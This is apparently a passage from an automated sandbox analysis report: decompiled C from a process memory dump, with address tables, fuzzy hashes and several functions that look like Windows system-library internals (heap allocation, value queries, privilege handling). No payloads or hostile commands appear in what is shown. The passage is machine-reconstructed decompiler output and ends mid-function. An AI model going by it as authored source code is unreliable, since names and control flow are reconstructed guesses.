0x04654d14
0x04654d16
0x00000000
0x00000000
0x04654d1c
0x04654d1c
0x04610499
0x04610535
0x04610535
0x00000000
0x04610535
0x046104a6
0x04654d2c
0x04654d37
0x04654d39
0x04654d3b
0x00000000
0x00000000
0x04654d41
0x04654d48
0x04610527
0x0461052b
0x0461052d
0x04610530
0x04610530
0x00000000
0x0461052b
0x04654d4e
0x046104ac
0x046104ac
0x046104af
0x046104b2
0x046104b7
0x046104b9
0x046104bb
0x046104bd
0x046104bf
0x046104c5
0x046104c9
0x04654d53
0x04654d59
0x04654db9
0x04654dba
0x04654dbf
0x04654dc2
0x04654dc4
0x04654dc7
0x04654dce
0x00000000
0x04654dce
0x04654d5b
0x04654d61
0x00000000
0x00000000
0x04654d63
0x04654d69
0x00000000
0x00000000
0x04654d6b
0x04654d6e
0x04654d74
0x04654d76
0x04654d7c
0x04654d7e
0x04654d84
0x04654d89
0x04654d8c
0x04654d8d
0x04654d92
0x04654d95
0x04654d96
0x04654d98
0x04654d9a
0x04654d9f
0x04654da4
0x04654da6
0x04654da8
0x04654daf
0x04654db1
0x04654db1
0x04654daf
0x04654da6
0x04654d84
0x04654d7c
0x00000000
0x04654d74
0x046104d6
0x04654de1
0x046104dc
0x046104dc
0x046104dc
0x046104e4
0x04654deb
0x04654df1
0x04654df8
0x04654dfe
0x04654e03
0x04654e05
0x04654e17
0x04654e07
0x04654e10
0x04654e10
0x04654e1c
0x04654e1f
0x04654e35
0x04654e35
0x04654e1f
0x04654df8
0x046104f1
0x046104fa
0x04654e3f
0x04654e47
0x04654e5b
0x04654e61
0x04654e67
0x04654e69
0x04654e71
0x04654e73
0x04610500
0x04610500
0x04610500
0x046104fa
0x04610508
0x0461051d
0x0461051d
0x0461051f
0x04610524
0x00000000
0x04610524
0x04610515
0x04610517
0x04654e7a
0x04654e7c
0x00000000
0x00000000
0x04654e85
0x00000000
0x04654e85
0x00000000
0x04610517

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a61db300fd3f045f5aa1bc61d2c570328338b8d83bb91cd5a34ab97a3ff31a8
Instruction ID: dcd6d5a08c95b746d2e67b72874bad2380543ce3b14bebd9c020531a39f5743b
Opcode Fuzzy Hash: 2a61db300fd3f045f5aa1bc61d2c570328338b8d83bb91cd5a34ab97a3ff31a8
Instruction Fuzzy Hash: F0911731E00614EFEF219A68C944BAD77A4EB45718F0902A6ED11AB7F1FB74BC80C785

Uniqueness

Uniqueness Score: -1.00%

Function 045EC600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E045EC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x46dd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E045F6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0462B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x46d7b9c; // 0x0
					_t74 = L04604620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04629650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L046077F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0462F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E046213C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L046077F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04629650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x045ec608
0x045ec615
0x045ec625
0x045ec62d
0x045ec635
0x045ec640
0x045ec680
0x045ec687
0x045ec688
0x045ec689
0x045ec694
0x045ec694
0x045ec642
0x045ec64a
0x045ec697
0x04657a25
0x04657a2b
0x04657a2e
0x04657a30
0x04657bea
0x04657bea
0x00000000
0x04657bea
0x04657a36
0x04657a43
0x04657a48
0x04657a4c
0x04657a4e
0x00000000
0x00000000
0x04657a58
0x04657a5a
0x04657a5b
0x04657a5c
0x04657a5d
0x04657a63
0x04657a64
0x04657a6a
0x04657a6c
0x04657a6e
0x046579cb
0x046579cb
0x046579ce
0x046579d0
0x04657a98
0x04657a9b
0x04657a9b
0x04657a9e
0x04657aa1
0x04657bbe
0x04657bbe
0x04657bc0
0x04657be0
0x04657be0
0x04657a01
0x04657a01
0x04657a05
0x04657a07
0x04657a15
0x04657a15
0x04657a1a
0x00000000
0x04657a1a
0x04657bc2
0x04657bc6
0x04657bc9
0x04657bcd
0x04657bcf
0x046579e6
0x046579e6
0x046579eb
0x046579eb
0x046579ef
0x046579f1
0x00000000
0x00000000
0x046579f3
0x046579f5
0x046579ff
0x046579ff
0x00000000
0x046579ff
0x046579f7
0x046579fd
0x00000000
0x00000000
0x00000000
0x046579fd
0x04657bd5
0x04657bd8
0x00000000
0x00000000
0x04657ba9
0x04657bac
0x04657bb0
0x04657bb1
0x04657bb1
0x04657bb6
0x00000000
0x04657bb6
0x04657aa7
0x04657aaa
0x00000000
0x00000000
0x04657ab2
0x04657ab3
0x04657ab5
0x04657aec
0x04657aef
0x04657b25
0x04657b28
0x04657b62
0x04657b64
0x04657b8f
0x04657b92
0x04657b96
0x04657b98
0x00000000
0x00000000
0x04657b9e
0x04657b9f
0x04657ba3
0x00000000
0x04657ba3
0x04657b66
0x04657b68
0x04657ae2
0x04657ae2
0x00000000
0x04657ae2
0x04657b6e
0x04657b72
0x04657b75
0x04657b81
0x04657b85
0x04657b87
0x00000000
0x00000000
0x04657b31
0x04657b34
0x04657b3c
0x04657b45
0x04657b46
0x04657b4f
0x04657b51
0x04657b57
0x04657b59
0x04657b59
0x00000000
0x04657b59
0x04657b77
0x00000000
0x04657b77
0x04657b2a
0x00000000
0x04657b2a
0x04657af1
0x04657af3
0x00000000
0x00000000
0x04657afb
0x04657afc
0x04657afe
0x00000000
0x00000000
0x04657b00
0x04657b03
0x00000000
0x00000000
0x04657b05
0x04657b09
0x04657b0d
0x04657b0f
0x00000000
0x00000000
0x04657b18
0x04657b1d
0x00000000
0x04657b1d
0x04657ab7
0x04657ab9
0x00000000
0x00000000
0x04657abf
0x04657ac1
0x00000000
0x00000000
0x04657ac3
0x04657ac6
0x00000000
0x00000000
0x04657ac8
0x04657acc
0x04657ad0
0x04657ad2
0x00000000
0x00000000
0x04657adb
0x00000000
0x04657adb
0x046579d6
0x046579d9
0x046579dc
0x04657a91
0x04657a94
0x00000000
0x04657a94
0x046579e2
0x00000000
0x046579e2
0x04657a74
0x04657a7a
0x00000000
0x00000000
0x04657a8a
0x04657a21
0x04657a21
0x00000000
0x04657a21
0x045ec650
0x045ec651
0x045ec656
0x045ec65c
0x045ec65d
0x045ec663
0x045ec664
0x045ec66a
0x045ec66e
0x046579c5
0x046579c7
0x00000000
0x046579c7
0x045ec67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e014757ca1053147889d44526d43014daf419e3878cd6cb153c8651f25de911b
Instruction ID: be1b20e912ef93f95484ea70e38a263626213cee183da4a3bfebd15e47628036
Opcode Fuzzy Hash: e014757ca1053147889d44526d43014daf419e3878cd6cb153c8651f25de911b
Instruction Fuzzy Hash: 9781AB766042469BDB25CE14C880A3BB3A8FB94356F14886EED45CB360F330FD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04666DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04666DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04666B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04607D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04629AE0();
					_t87 = L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0466795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0466795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0466795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0466795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04604620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04666B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04666B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04666B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04666B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04607D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04629AE0();
								L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04602400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04602400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04602400( &_v52);
							}
							if(_v28 >= 0) {
								return L04602400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x04666dd4
0x04666dde
0x04666de1
0x04666de3
0x04666de6
0x04666de9
0x04666dec
0x04666def
0x04666df2
0x04666df5
0x04666dfe
0x04666e04
0x04666e09
0x04666e0d
0x04666e18
0x04666e1b
0x04666e22
0x04666e2d
0x04666e30
0x04666e36
0x04666e42
0x04666e4d
0x04666e50
0x04666e55
0x04666e5c
0x04666e6e
0x04666e5e
0x04666e67
0x04666e67
0x04666e73
0x04666e74
0x04666e77
0x04666e7c
0x04666e7d
0x04666e8e
0x04666e93
0x04666e9c
0x04666ea8
0x04666eab
0x04666eac
0x04666eb3
0x04666ecd
0x04666edc
0x04666ee2
0x04666ee5
0x04666ef2
0x04666efb
0x04666f01
0x04666f06
0x04666f0b
0x04666f11
0x04666f1a
0x04666f22
0x04666f26
0x04666f26
0x04666f33
0x04666f41
0x04666f44
0x04666f47
0x04666f54
0x04666f65
0x04666f77
0x04666f7c
0x04666f82
0x04666f91
0x04666f99
0x04666fa3
0x04666fae
0x04666fae
0x04666fba
0x04666fbb
0x04666fbc
0x04666fc1
0x04666fc2
0x04666fd3
0x04666fd8
0x04666fd8
0x04666fdf
0x04666fe8
0x04666fee
0x04666fee
0x04666ff5
0x04666ffb
0x04666ffb
0x04667004
0x00000000
0x0466700a
0x04667004
0x04666eb3
0x04666e9c
0x04667015

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: b91be1eb9eee44c52a219c04b4df3cd73b4b93cea6b9f96cff469e306f17bdc4
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 45718C71A00619EFDB14DFA4D984AEEBBB9FF48708F104169E505E7290EB30BA45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0467B8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0467B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x46d7b9c; // 0x0
				_t124 = L04604620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04629800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E046295B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E046295D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L046077F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04629910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E046295D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x46d7b9c; // 0x0
									_t92 = L04604620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04629910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E045EA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0467E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0467E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E046295B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0467b8d9
0x0467b8e4
0x00000000
0x0467b8e6
0x0467b8f3
0x0467b8f5
0x0467b8f5
0x0467b8f8
0x0467b920
0x0467b924
0x0467b936
0x0467b939
0x0467b93d
0x0467b948
0x0467b9a0
0x0467b9a0
0x0467b9a4
0x0467b9bf
0x0467b9c4
0x0467b9c6
0x0467b9cd
0x0467b9d1
0x0467bad4
0x0467bad8
0x0467bada
0x0467badc
0x0467badc
0x0467badf
0x0467bae0
0x0467bae2
0x0467bae4
0x0467baec
0x0467baee
0x0467baf0
0x0467baf0
0x0467baec
0x0467bafb
0x0467bafc
0x0467bafe
0x0467bb01
0x0467bb01
0x00000000
0x0467bb06
0x0467b9d7
0x0467b9db
0x0467b9db
0x0467b9de
0x0467b9de
0x0467b9e4
0x0467b9e7
0x0467b9ea
0x0467b9ec
0x0467b9ef
0x0467b9f3
0x0467ba1b
0x0467ba1b
0x0467ba23
0x0467ba24
0x0467ba27
0x0467ba2a
0x0467ba2b
0x0467ba2e
0x0467ba30
0x0467ba37
0x0467ba3f
0x0467ba9c
0x0467baa2
0x0467bb13
0x0467bb15
0x0467baae
0x0467baae
0x0467bab3
0x0467bab5
0x0467baba
0x0467bac8
0x0467bac8
0x0467baba
0x0467bacd
0x0467bacf
0x00000000
0x0467bacf
0x0467bb1a
0x00000000
0x0467bb1c
0x0467baa7
0x0467bb11
0x00000000
0x0467bb11
0x0467baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0467ba41
0x0467ba41
0x0467ba41
0x0467ba58
0x0467ba5d
0x0467ba62
0x00000000
0x00000000
0x0467ba64
0x0467ba67
0x0467ba68
0x0467ba69
0x0467ba6c
0x0467ba6f
0x0467ba71
0x0467ba78
0x0467ba80
0x00000000
0x00000000
0x0467ba90
0x0467ba90
0x0467ba97
0x00000000
0x0467ba97
0x0467b9f5
0x0467b9f7
0x0467b9f7
0x0467b9fa
0x0467ba03
0x0467ba07
0x0467ba0c
0x0467ba10
0x0467ba17
0x00000000
0x0467b9f7
0x0467b9a6
0x0467b9a8
0x0467b9af
0x0467b9b3
0x00000000
0x00000000
0x0467b9b9
0x00000000
0x0467b9b9
0x0467b94d
0x0467b98f
0x0467b995
0x0467b999
0x0467b960
0x0467b967
0x0467b968
0x0467b96a
0x00000000
0x0467b96a
0x0467b99b
0x0467b99e
0x00000000
0x00000000
0x00000000
0x0467b99e
0x0467b951
0x0467b954
0x0467b95a
0x0467b95e
0x0467b972
0x0467b979
0x0467b97d
0x0467b97f
0x0467b980
0x0467b982
0x0467b984
0x00000000
0x0467b984
0x00000000
0x0467b926
0x00000000
0x0467b926

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42a07e0a25be4359944878f91c865526c3ad32dcba6284f7e14870002220888
Instruction ID: 82982b4e73fa554f764a1c4c1e1811f49b414fcf3eecc178b1a44520acd87d48
Opcode Fuzzy Hash: e42a07e0a25be4359944878f91c865526c3ad32dcba6284f7e14870002220888
Instruction Fuzzy Hash: 0471FF32200B01AFE731DF24C944F66B7A5EF80B28F24452CEA659B2A1FB75F945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E52A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E045E52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E045FEEF0(0x46d79a0);
					_t104 =  *0x46d8210; // 0xa02bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E045FEB70(_t93, 0x46d79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
